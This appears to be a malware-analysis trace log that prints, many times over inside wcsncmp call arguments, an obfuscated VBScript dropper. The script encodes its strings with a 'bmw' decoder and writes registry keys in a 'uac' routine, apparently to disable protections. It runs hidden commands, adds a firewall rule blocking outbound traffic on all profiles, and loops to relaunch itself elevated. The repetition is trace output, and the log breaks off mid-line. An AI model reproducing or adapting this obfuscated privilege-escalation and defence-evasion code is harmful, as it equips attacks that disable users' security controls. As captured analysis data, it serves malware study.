bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.378] wcsncmp (_String1="ewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.378] wcsncmp (_String1="wRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0226.378] wcsncmp (_String1="Rule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0226.378] wcsncmp (_String1="ule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.378] wcsncmp (_String1="le.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, 